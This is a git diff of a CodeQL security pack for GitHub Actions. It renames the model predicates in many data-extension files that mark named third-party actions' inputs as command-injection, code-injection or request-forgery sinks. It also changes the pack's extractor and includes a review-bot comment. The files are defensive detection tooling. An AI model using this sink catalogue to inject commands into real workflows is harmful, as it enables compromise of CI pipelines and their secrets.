--- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
+++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"]
diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
index 2d162fbc9147..6bfaffb2bbab 100644
--- a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
+++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"]
 - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection", "manual"]
diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml
index fc91bacdb72d..03fa8beaf0b3 100644
--- a/ql/lib/ext/msys2_setup-msys2.model.yml
+++ b/ql/lib/ext/msys2_setup-msys2.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"]
 - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml
index 8b2b4e79afa5..a4ccaac2d2e0 100644
--- a/ql/lib/ext/mxschmitt_action-tmate.model.yml
+++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"]
 - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection", "manual"]
diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
index 2ea1fdf68556..7c32705dde54 100644
--- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
+++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
@@ -1,12 +1,12 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"]
 - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml
index 21e0d819db74..902483f43997 100644
--- a/ql/lib/ext/nanasess_setup-chromedriver.model.yml
+++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml
index bcc8ce6b80db..be86a330b97e 100644
--- a/ql/lib/ext/nanasess_setup-php.model.yml
+++ b/ql/lib/ext/nanasess_setup-php.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml
index 741ab37eb9b6..0a6f7c347226 100644
--- a/ql/lib/ext/nick-fields_retry.model.yml
+++ b/ql/lib/ext/nick-fields_retry.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"]
 - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection", "manual"]
diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml
index a9d6b80a627f..613b3e0fc59f 100644
--- a/ql/lib/ext/octokit_graphql-action.model.yml
+++ b/ql/lib/ext/octokit_graphql-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"]
diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml
index 73d4df99af28..489d47ac71e9 100644
--- a/ql/lib/ext/octokit_request-action.model.yml
+++ b/ql/lib/ext/octokit_request-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"]
diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml
index fb6ae5102e1b..4a98ecd4af16 100644
--- a/ql/lib/ext/olafurpg_setup-scala.model.yml
+++ b/ql/lib/ext/olafurpg_setup-scala.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml
index 8b29e5c99881..57dc40ef6b8b 100644
--- a/ql/lib/ext/paambaati_codeclimate-action.model.yml
+++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"]
diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml
index 5a5cedcaca5f..3b92f667ae90 100644
--- a/ql/lib/ext/peter-evans_create-pull-request.model.yml
+++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"]
diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml
index d156d7da6581..da8b02312ea0 100644
--- a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml
+++ b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"]
diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml
index 12d3f23f8fdf..c06d13301d27 100644
--- a/ql/lib/ext/plasmicapp_plasmic-action.model.yml
+++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"]
 - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection", "manual"]
diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml
index 30be564c42a4..61935c36f7d6 100644
--- a/ql/lib/ext/preactjs_compressed-size-action.model.yml
+++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"]
 - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection", "manual"]
diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml
index 13d4cfeb814d..89f61cedc422 100644
--- a/ql/lib/ext/py-actions_flake8.model.yml
+++ b/ql/lib/ext/py-actions_flake8.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"]
 - ["py-actions/flake8", "*", "input.plugins", "command-injection", "manual"]
diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml
index 3043c9b30ec2..1aabfc23fc4b 100644
--- a/ql/lib/ext/py-actions_py-dependency-install.model.yml
+++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"]
diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml
index 29d51d1bfbba..d55fdbc3ea98 100644
--- a/ql/lib/ext/pyo3_maturin-action.model.yml
+++ b/ql/lib/ext/pyo3_maturin-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"]
 - ["pyo3/maturin-action", "*", "input.target", "command-injection", "manual"]
diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
index 75a9650a92fb..d01ac86d3178 100644
--- a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
+++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"]
 - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection", "manual"]
diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml
index a85a4b466e25..bab76cbe27ff 100644
--- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml
+++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"]
diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml
index a0c4d6f7ec50..02ac5032c797 100644
--- a/ql/lib/ext/reggionick_s3-deploy.model.yml
+++ b/ql/lib/ext/reggionick_s3-deploy.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"]
 - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection", "manual"]
diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml
index b5d4629003b7..0c484d44549b 100644
--- a/ql/lib/ext/renovatebot_github-action.model.yml
+++ b/ql/lib/ext/renovatebot_github-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"]
 - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml
index 4b96edeccc2f..c088c7a644eb 100644
--- a/ql/lib/ext/roots_issue-closer-action.model.yml
+++ b/ql/lib/ext/roots_issue-closer-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"]
 - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection", "manual"]
diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml
index ae3ef2e2b1b7..5b22ac1f5fe8 100644
--- a/ql/lib/ext/ros-tooling_setup-ros.model.yml
+++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"]
diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml
index 079dfc1fc02b..3329a255e6f8 100644
--- a/ql/lib/ext/ruby_setup-ruby.model.yml
+++ b/ql/lib/ext/ruby_setup-ruby.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
index 19edd617c670..14a1cdeed86a 100644
--- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
+++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"]
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"]
diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/sergeysova_jq-action.model.yml
index 8ab1d090b1cc..49931d93f885 100644
--- a/ql/lib/ext/sergeysova_jq-action.model.yml
+++ b/ql/lib/ext/sergeysova_jq-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"]
diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml
index 9f8d987c0aff..37d0014bcbb4 100644
--- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml
+++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"]
diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml
index 90a181038680..9058c9fb984c 100644
--- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml
+++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"]
diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
index fd484074f5c5..713c5c61cea7 100644
--- a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
+++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml
index 5caaea9562e1..40b02283152a 100644
--- a/ql/lib/ext/snow-actions_eclint.model.yml
+++ b/ql/lib/ext/snow-actions_eclint.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml
index 9462b8d5bbd1..c08505f97477 100644
--- a/ql/lib/ext/stackhawk_hawkscan-action.model.yml
+++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"]
 - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection", "manual"]
diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml
index 9b01987e1f28..6305fd339604 100644
--- a/ql/lib/ext/step-security_harden-runner.model.yml
+++ b/ql/lib/ext/step-security_harden-runner.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"]
diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml
index 10a3630ea0bd..739880968188 100644
--- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml
+++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"]
diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml
index aac20afddf56..ee9a0dbb32a6 100644
--- a/ql/lib/ext/tibdex_backport.model.yml
+++ b/ql/lib/ext/tibdex_backport.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"]
 - ["tibdex/backport", "*", "input.head_template", "code-injection", "manual"]
diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml
index 8dcabd1650a6..f056cf5d8644 100644
--- a/ql/lib/ext/timheuer_base64-to-file.model.yml
+++ b/ql/lib/ext/timheuer_base64-to-file.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: summaryModel
+ extensible: actionsSummaryModel
 data:
 - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"]
 - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint", "manual"]
diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml
index d98eda4e69f8..838f0b308487 100644
--- a/ql/lib/ext/tj-actions_branch-names.model.yml
+++ b/ql/lib/ext/tj-actions_branch-names.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 # https://github.com/tj-actions/branch-names
 - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"]
diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml
index b8fb2514253c..c215755f61dd 100644
--- a/ql/lib/ext/trilom_file-changes-action.model.yml
+++ b/ql/lib/ext/trilom_file-changes-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"]
 - ["trilom/file-changes-action", "*", "output.files_added", "filename", "manual"]
diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml
index ae166b1f5154..014e779b29a0 100644
--- a/ql/lib/ext/tripss_conventional-changelog-action.model.yml
+++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"]
 - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection", "manual"]
diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml
index a6cc68843895..806c055529df 100644
--- a/ql/lib/ext/tryghost_action-deploy-theme.model.yml
+++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"]
 - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection", "manual"]
diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml
index 499161aafcb3..d6e554a87092 100644
--- a/ql/lib/ext/tzkhan_pr-update-action.model.yml
+++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"]
diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml
index a352d6c9ff61..55d1531a7707 100644
--- a/ql/lib/ext/veracode_veracode-sca.model.yml
+++ b/ql/lib/ext/veracode_veracode-sca.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"]
 - ["veracode/veracode-sca", "*", "input.path", "command-injection", "manual"]
diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml
index 6ed71f182151..c52d62e204a4 100644
--- a/ql/lib/ext/wearerequired_lint-action.model.yml
+++ b/ql/lib/ext/wearerequired_lint-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"]
 - ["wearerequired/lint-action", "*", "input.git_email", "command-injection", "manual"]
diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml
index 5864c0d0ede0..1e915194d96e 100644
--- a/ql/lib/ext/webfactory_ssh-agent.model.yml
+++ b/ql/lib/ext/webfactory_ssh-agent.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"]
 - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection", "manual"]
diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml
index 173ecfc4222f..1cc360c472d2 100644
--- a/ql/lib/ext/xt0rted_slash-command-action.model.yml
+++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sourceModel
+ extensible: actionsSourceModel
 data:
 - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"]
 - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"]
diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml
index 880b0d606da2..cb7e0936cca1 100644
--- a/ql/lib/ext/zaproxy_action-baseline.model.yml
+++ b/ql/lib/ext/zaproxy_action-baseline.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"]
 - ["zaproxy/action-baseline", "*", "input.target", "command-injection", "manual"]
diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml
index fd8172c6ca84..210c3365eda9 100644
--- a/ql/lib/ext/zaproxy_action-full-scan.model.yml
+++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml
@@ -1,7 +1,7 @@
 extensions:
 - addsTo:
 pack: githubsecuritylab/actions-all
- extensible: sinkModel
+ extensible: actionsSinkModel
 data:
 - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"]
 - ["zaproxy/action-full-scan", "*", "input.target", "command-injection", "manual"]
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 5cfa47a5cdf6..89f8511812b4 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -4,14 +4,13 @@ warnOnImplicitThis: true
 name: githubsecuritylab/actions-all
 version: 0.0.36
 dependencies:
+ codeql/javascript-all: ^1.0.0
 codeql/util: ^1.0.0
 codeql/yaml: ^1.0.0
 codeql/controlflow: ^1.0.0
 codeql/dataflow: ^1.0.0
-dbscheme: yaml.dbscheme
-extractor: yaml
-groups:
- - yaml
+extractor: javascript
+groups: javascript
 dataExtensions:
 - ext/*.model.yml
 - ext/**/*.model.yml
diff --git a/ql/lib/yaml.dbscheme b/ql/lib/yaml.dbscheme
deleted file mode 100644
index 20d83c71ee67..000000000000
--- a/ql/lib/yaml.dbscheme
+++ /dev/null
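Review bot: The `ql/lib/qlpack.yml` hunk replaces the pack's own `dbscheme: yaml.dbscheme` with a floating `codeql/javascript-all: ^1.0.0` dependency whose only visible role is to supply the JavaScript dbscheme, so which dbscheme the library pack compiles against is now decided at lock-resolution time rather than by this file. A dbscheme has to match the CLI's JavaScript extractor exactly, so either pin that dependency to the version your CLI ships with or record the intended CLI version next to it. The reason for the switch is also not stated anywhere in the hunk; a one-line comment above `extractor: javascript`, e.g. `# Built against the JavaScript extractor (which also extracts .github/workflows YAML) so the pack runs inside a standard javascript analysis — confirm this is the intent`, would save the next maintainer guessing. Note that `groups: javascript` here uses the scalar form while the test pack in this series uses a list, which is presumably accepted but worth keeping consistent.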
@@ -1,80 +0,0 @@
-/*- YAML -*/
-
-#keyset[parent, idx]
-yaml (unique int id: @yaml_node,
- int kind: int ref,
- int parent: @yaml_node_parent ref,
- int idx: int ref,
- string tag: string ref,
- string tostring: string ref);
-
-case @yaml_node.kind of
- 0 = @yaml_scalar_node
-| 1 = @yaml_mapping_node
-| 2 = @yaml_sequence_node
-| 3 = @yaml_alias_node
-;
-
-@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node;
-
-@yaml_node_parent = @yaml_collection_node | @file;
-
